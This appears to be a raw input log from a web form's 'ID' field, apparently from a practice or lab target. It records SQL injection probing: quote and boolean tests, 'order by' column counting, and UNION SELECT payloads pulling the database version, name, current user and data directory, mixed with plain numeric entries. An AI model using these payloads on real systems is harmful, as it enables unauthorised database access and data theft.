ID:1
ID:1
ID:2
ID:3
ID:4
ID:5
ID:5'
ID:5' order by 1--
ID:5' order by 100--
ID:5' order by 100-- -
ID:5' order by 10-- -
ID:5' order by 8-- -
ID:5' order by 7-- -
ID:5' order by 6-- -
ID:5' order by 5-- -
ID:5' order by 4-- -
ID:5' order by 3-- -
ID:5' union select 3-- -
ID:5' union select 3-- -
ID:5' union select 1,2,3-- -
ID:5' union select 1,2,3,4-- -
ID:5' union select 1,2,3-- -
ID:5' union select 1,2,version()-- -
ID:5' union select 1,version(),3-- -
ID:5' union select version(),2,3-- -
ID:5' SELECT UNION 1,2,3-- -
ID:5' union select 1,2,3-- -
ID:5' UNION SELECT 1,2,3-- -
ID:5' UNION SELECT 1,2,3-- -
ID:5' UNION SELECT 1,2-- -
ID:5' UNION SELECT 1,2,3-- -
ID:5' UNION SELECT 1,2,3-- -
ID:5' UNION SELECT database(),2,3-- -
ID:5' UNION SELECT 1,2,3-- -
ID:1
ID:2
ID:3
ID:=4
ID:
ID:16
ID:1
ID:good
ID:1'
ID:anam
ID:1'
ID:aman'
ID:6'
ID:6" -- 
ID:1")-- 
ID:1")-- 
ID:1'
ID:1"
ID:1' order by 1--
ID:null order by 1--
ID:1' order by 1-- -
ID:1' order by 10-- -
ID:1' order by 10--  
ID:1' order by 4-- -
ID:1' order by 3-- -
ID:1' order by 1,2,3-- -
ID:1'
ID:1'-- 
ID:1' -- 
ID:1' -- 
ID:1'
ID:1'
ID:1"
ID:1'
ID:1'
ID:1' -- 
ID:1" -- 
ID:1'
ID:1' -- 
ID:1' AND 1
ID:1' AND 0
ID:1' AND 0 -- 
ID:1' AND 1 -- 
ID:/'
ID:1"
ID:1 order by 3-- -
ID:1 order by 3--
ID:1 order by 3-- 
ID:1 order by 3-- -
ID:1' order by 3-- -
ID:1'
ID:1'order by 1--
ID:1'order by 1-- -
ID:1 order by 51--
ID:1 order by 51-- -
ID:1' order by 51-- -
ID:1
ID:1'
ID:1
ID:1'
ID:1'-- 
ID:1' or 1
ID:1' or '1
ID:1' or '1'
ID:1' union select 1 AND '1
ID:1' union select 1,2
ID:1' union select 1,2 AND 1
ID:1' union select 1,2 AND '1
ID:1' union select 1,2 AND '1
ID:1' union select 1,2,3 AND '1
ID:-1' union select 1,2,3 AND '1
ID:-1' union select 1,2,3 AND '2
ID:-1' union select 1,1,3 AND '2
ID:-1' union select 1,version(),3 AND '2
ID:-1' union select 1,current_user,3 AND '2
ID:-1' union select 1,current_user,3 AND ' 1
ID:-1' union select 1,current_user,3 AND ' 0
ID:-1' union select 1,current_user,3 AND ' 1
ID:-1' union select 1,@@datadir,3 AND ' 1
ID:1'
ID:1' --
ID:1' -- -
ID:-1' -- -
ID:-1' union select 1,2,3
ID:-1' union select 1,2,3 and ' 1
ID:1' union select 1,2,3 and ' 1
ID:1' union select 1,2,3 and ' 1
ID:1
ID:1'
ID:
ID:
ID:1
ID:
ID:
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1'
ID:
ID:
ID:
ID:
ID:
ID:1
ID:1
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1'
ID:
ID:1
ID:
ID:
ID:
ID:
ID:
ID:1
ID:2
ID:2'
ID:2
ID:
ID:
ID:
ID:1
ID:1
ID:1
ID:1'
ID:1
ID:1'
ID:1
ID:1
ID:1'
ID:1"
ID:
ID:1
ID:1
ID:1'
ID:1
ID:1
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1'
ID:2
ID:3
ID:4
ID:5
